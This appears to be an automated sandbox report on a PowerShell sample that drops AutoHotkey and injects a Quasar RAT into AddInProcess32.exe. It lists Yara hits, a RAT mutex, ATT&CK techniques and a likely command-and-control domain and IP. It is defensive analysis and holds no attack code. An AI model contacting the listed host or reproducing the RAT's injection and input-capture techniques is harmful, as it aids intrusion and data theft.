FileKbdLayerDescriptorsc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAllClipboard...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264MasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWMonitorCountMonitorPrimaryMonitorMonitorWorkAreaMonitorNameAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightShowAddRenameCheckUncheckToggleCheckEnableDisableToggleEnableStandardNoStandardColorNoDefaultDeleteAllTipIconNoIconMainWindowNoMainWindowSubmitCancelHideMinimizeMaximizeRestoreDestroyMarginFontListViewTreeViewFlashNewMoveMoveDrawFocusChooseChooseStringPosFocusVEnabledVisibleHwndNameButtonCheckboxRadioDDLDropDownListComboBoxListBoxUpDownSliderTab2Tab3GroupBoxPicPictureDateTimeMonthCalStatusBarActiveXLinkCustomPriorityInterruptNoTimersCloseWaitCloseStyleExStyleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceListLineCountCurrentLineCurrentColSelectedEjectLockUnlockLabelFileSystemFSSetLabel:SerialTypeStatus
Source: AutoHotkey64.exe, 00000013.00000002.4204174495.00000000007F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ,Progman
Source: AutoHotkey64.exe.0.dr	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_000000014002A757 GetFileAttributesW,SetCurrentDirectoryW,free,GetSystemTimeAsFileTime,

19_2_000000014002A757

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_0000000140076750 GetComputerNameW,GetUserNameW,

19_2_0000000140076750

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_00000001400DC058 HeapCreate,GetVersion,HeapSetInformation,

19_2_00000001400DC058

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Quasar RAT

Source: Yara match	File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1927919605.000000000273B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1854587486.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1930008150.000000000270B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1930172049.000000000276B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1927403521.000000000231B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1855061423.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7804, type: MEMORYSTR

Source: AutoHotkey64.exe	Binary or memory string: WIN_XP
Source: AutoHotkey64.exe	Binary or memory string: WIN_VISTA
Source: AutoHotkey64.exe	Binary or memory string: WIN_7
Source: AutoHotkey64.exe.0.dr	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingleWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003%04hX0x%IxpPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkCountarraypcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCallbackFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfo
Source: AutoHotkey64.exe	Binary or memory string: WIN_8
Source: AutoHotkey64.exe	Binary or memory string: WIN_8.1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Directory queried: C:\Users\Public\Documents

Jump to behavior

Remote Access Functionality

Detected Quasar RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_nCFXZUEaa8h2uJHNCI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_nCFXZUEaa8h2uJHNCI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_nCFXZUEaa8h2uJHNCI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_nCFXZUEaa8h2uJHNCI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_nCFXZUEaa8h2uJHNCI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_nCFXZUEaa8h2uJHNCI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_nCFXZUEaa8h2uJHNCI

Yara detected Quasar RAT

Source: Yara match	File source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1927919605.000000000273B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1854587486.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1930008150.000000000270B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1930172049.000000000276B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1927403521.000000000231B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1855061423.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7804, type: MEMORYSTR

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140028980 Shell_NotifyIconW,RemoveClipboardFormatListener,ChangeClipboardChain,DestroyWindow,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,free,free,free,	19_2_0000000140028980
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140080CE0 RemoveClipboardFormatListener,ChangeClipboardChain,	19_2_0000000140080CE0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140029620 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,	19_2_0000000140029620

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	121 Input Capture	11 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	312 Process Injection	1 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	121 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	31 Security Software Discovery	SSH	3 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	12 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
x.ps1	5%	Virustotal		Browse
x.ps1	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Documents\AutoHotkey64.exe	3%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://schemas.datacontract.org/2004/07/xClient.Core.Data	0%	Avira URL Cloud	safe
https://autohotkey.comCould	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high
feature-ssa.mywire.org	66.225.254.246	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/json/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://freegeoip.net/xml/	AddInProcess32.exe, 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1782858040.0000012DBFE88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	AddInProcess32.exe, 00000006.00000002.4213601750.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1782858040.0000012DBFE88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://autohotkey.com	AutoHotkey64.exe, AutoHotkey64.exe, 00000013.00000000.3468684177.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe.0.dr	false		high
https://go.micro	powershell.exe, 00000000.00000002.1782858040.0000012DC01E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1812122999.0000012DCFF8F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.ipify.org/	AddInProcess32.exe, 00000007.00000002.1846910881.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1782858040.0000012DBFC61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1782858040.0000012DBFC61000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.4213601750.00000000028F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/xClient.Core.Data	AddInProcess32.exe, 00000006.00000002.4213601750.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1782858040.0000012DBFE88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://autohotkey.comCould	powershell.exe, 00000000.00000002.1812122999.0000012DD089D000.00000004.00000800.00020000.00000000.sdmp, AutoHotkey64.exe, 00000002.00000000.1778420471.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000004.00000000.1796075931.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000013.00000000.3468684177.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe, 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey64.exe.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
66.225.254.246	feature-ssa.mywire.org	United States		33633	USG-CORPORATIONUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577249
Start date and time:	2024-12-18 10:19:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	x.ps1
